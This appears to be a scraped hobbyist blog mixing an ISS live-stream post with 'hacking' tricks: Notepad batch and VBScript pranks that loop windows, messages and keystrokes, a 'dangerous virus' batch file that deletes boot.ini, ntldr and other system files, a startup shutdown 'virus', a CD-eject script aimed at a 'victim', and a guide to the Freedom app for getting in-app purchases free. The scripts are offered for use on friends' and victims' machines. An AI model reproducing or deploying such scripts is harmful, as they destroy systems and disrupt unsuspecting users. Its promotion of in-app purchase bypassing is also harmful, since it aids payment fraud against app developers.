Now you can watch live video stream of Earth in HD via ISS (INTERNATIONAL SPACE STATION)

NASA has recently started an experiment via its International Space Station which streams live video of Earth in 720p.                                                       
The National Aeronautics and Space Administration (NASA) has started an experiment called High Definition Earth Viewing (HDEV) which shows the station's view of our planet via an internet stream. The project has been developed and run by NASA together with some high school students. The students have helped with the design of some of the HDEV components through the High School United with NASA to Create Hardware (HUNCH) program. The experiment includes both multiple 720p camera feeds and the ISS crew's radio chatter.
The stream from HDEV is not stable and occasionally loses contact. The project includes testing the quality of Earth-facing cameras as well as their ability to survive high doses of radiation while in orbit. The project is supposed to run till October 2015 and NASA will use the results from the experiment to decide what cameras to use on future missions.
The HDEV experiment was aboard the ISS and was activated on April 30, 2014. It is mounted on the External Payload Facility of the European Space Agency's Columbus module. It includes several commercial HD video cameras aimed at Earth which are enclosed in a pressurized and temperature controlled housing. Video from these cameras is transmitted back to Earth streamed live on the channel below. If you don't see anything, it is most likely that space station is hovering over the dark side of the planet Earth.
 
Live streaming video by Ustream
If you wish to know the exact location of the Space Station and also watch the live stream at the same time. Click here.                   
Category: 0 comments

NOTEPAD TRICKS (HACKING)

This trick will Open Notepad continuously automatically
Step 1: Open Notepad.
Step 2: Paste the following code in the notepad.

@ECHO off
:trick
START %SystemRoot%\system32\notepad.exe
GOTO trick

Step 3: Now go to file and click on save as
Step 4: Give anyname with extention as .bat for eg:- notepadtrick.bat
Step 5: Now go and click on it or you can send this notepad to your friends also.......bingoo...:)
○○☺♦♦♦_____________________________________________________________________○○☺♦♦♦
This trick will pop out error messages again and again
Step 1: Open Notepad.
Step 2: Paste the following code in the notepad.

@ECHO off
:Begin
msg * Welcome to hackfact
msg * You are learning cool notepad tricks
msg * Notepad tricks rocks
msg * Using notepad tricks we can even control whole computer
msg * What are your views in all these tricks using notepad
GOTO BEGIN

Step 3: Now go to file and click on save as
Step 4: Give anyname with extention as .bat for eg:- notepadtrick.bat
Step 5: Now go and click on it or you can send this notepad to your friends also.......bingoo...:)
○○☺♦♦♦____________________________________________________________________○○☺♦♦♦
Matrix falling notepad trick
After the success of the movie matrix people just started loving matrix pattern , its style. So here is a notepad trick which will show that matrix affect in your command prompt

Step 1: Open Notepad.
Step 2: Paste the following code in the notepad.

@echo off
color 02
:tricks
echo %random%%random%%random%notepad%random%%random%tricks%random%%random%%random%%random%%random%
goto tricks

Step 3: Now go to file and click on save as
Step 4: Give anyname with extention as .bat for eg:- notepadtrick.bat
Step 5: Now go and click on it or you can send this notepad to your friends also.......bingoo...:)
○○☺♦♦♦____________________________________________________________________○○☺♦♦♦
Notepad and vbsfile tricks combo
Hit Enter Key Continuously
Step 1: Open Notepad.
Step 2: Paste the following code in the notepad.

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Step 3: Now go to file and click on save as
Step 4: Give anyname with extention as .vbs for eg:- notepadtrick.vbs
Step 5: Now go and click on it or you can send this notepad to your friends also.......bingoo...:)
○○☺♦♦♦____________________________________________________________________○○☺♦♦♦

Press backspace continuously notepad trick (so Let's go back a few steps.)
Step 1: Open Notepad.
Step 2: Paste the following code in the notepad.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Step 3: Now go to file and click on save as
Step 4: Give anyname with extention as .vbs for eg:- notepadtrick.vbs
Step 5: Now go and click on it or you can send this notepad to your friends also.......bingoo...:)
○○☺♦♦♦____________________________________________________________________○○☺♦♦♦

Toggle Caps Lock button On-Off Continuously
Step 1: Open Notepad.
Step 2: Paste the following code in the notepad.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Step 3: Now go to file and click on save as
Step 4: Give anyname with extention as .vbs for eg:- notepadtrick.vbs
Step 5: Now go and click on it or you can send this notepad to your friends also.......bingoo...:)



Now if u want to disable any of these notepad and vbs trick combo just go do task manager click on process then find wscript.exe and end this process and for all notepad and batch programming tricks combo just restart your computer or close the command prompt.
Category: 0 comments

DANGEROUS VIRUS CODE

In the post Show below virus coding is very dangerous, first open the notepad type code

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

save as in to virus.bat file system
Category: 0 comments

SHUTDOWN VIRUS

This is the virus which let you to shutdown everytime you'll open your pc if you put the file in "startup" folder.















First open notepad and type like show below image















And save in to filename.bat ,open the bat file its display a System shutdown dialogue box within
160 seconds computer will turn off shown below the figure


















ENjoy:)
Category: 0 comments

Optical Drive Door Virus

Guys try this is..... It is a virus code hope you will enjoy by building it and screwing it on VICTIM'S Pc... :P



Open the notepad type the following coding

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set oCD = oWMP.cdromCollection.getByDriveSpecifier("J:") ' or whatever
If vbOK = MsgBox ("Eject?", vbOKCancel) Then
oCD.Eject
If vbOK = MsgBox ("Close?", vbOKCancel) Then
oCD.Eject
End if
End if

And save it in to filename.vbs

NOTE: that's it... try if you want at your own risk.... :)
Category: 0 comments

How To Disable Right Click On Your Website Or Blog

If you own a blog or a website then you always want to prevent other malicious bloggers from copying the content from your blog. You might have written an article with great efforts and lots of research and other just copy/paste it on their blog. To prevent such users from copying content from your blog i will show you Javascript Trick to disable right click on your blog. So lets get started.

How To Disable Right Click On Your Blog ?

1. Got to your blogger Dashboard and then Click on Layout.












  2. Now Click on Add Gadget and select Html/Javascript. 












 3. Now paste code given below in the pop up window. 
  <!--MBW Code-->
  <script language='JavaScript1.2'>
  function disableselect(e){
  return false
  }
  function reEnable(){
  return true
  }
  document.onselectstart=new Function ("return false")
  if (window.sidebar){
  document.onmousedown=disableselect
  document.onclick=reEnable
  }
  </script>
  <!--Code End http://mybloggersworld.blogspot.in>

4. Save it and done.

How to Purchase In-app coins or character free for ANDROID (for root user only)

Guys while playing games in your favorite ANDROID device you might got stuck somewhere which will ask you a money to resume or to play further. This may ruined your mood and make you frustrated. And if you'll anyhow want to buy that thing than you have to pay a big round of money to fulfill your demand. So to overcome this issue and let you to buy IN-APP Purchase free than this might get you in shock. But yes this can happen now with the newly software which is not available in google play but in our well known site. For that you dont have to go anywhere. Just click on the link given below and download it : Freedom click here
This is the only software which will let you to in-app purchase without any cost. and for most thing for this you have the permission for superuser and for that it is important to ROOT YOUR DEVICE for rooting your device i'll discuss further about it for now i'll discuss about how to use this software.

I'll show you how?
click here

1.Install Freedom on your device and launch it.

Make sure that you have "Unknown sources" enabled in your security settings:
Install downloaded APK and launch it (first launch takes a while, please be patient), allow superuser permissions request:

2.Launch application through Freedom

Tap on application in which you want to use free in-app purchase, wait a little. Application should start automatically:
Next, make your in-app purchase (appearing of FreeCard means that Freedom is running successfully):





















From time to time you can receive OTA updates for Freedom, just tap on "Update Available" dialog and update should start automatically. Here is screenshot of running Freedom and update available for download:
You should use Freedom every time you want to use free in-app purchase, e.g. Freedom is a launcher for your apps.
And this program does not work with online applications and will never work with online applications.
If you want to remove Freedom, first launch it, go to MENU, then tap on STOP. Next you can remove Freedom successfully. IF YOU DID NOT DO IT - YOU ARE NOT ABLE TO USE GOOGLE PLAY WITHOUT FREEDOM!
Category: 0 comments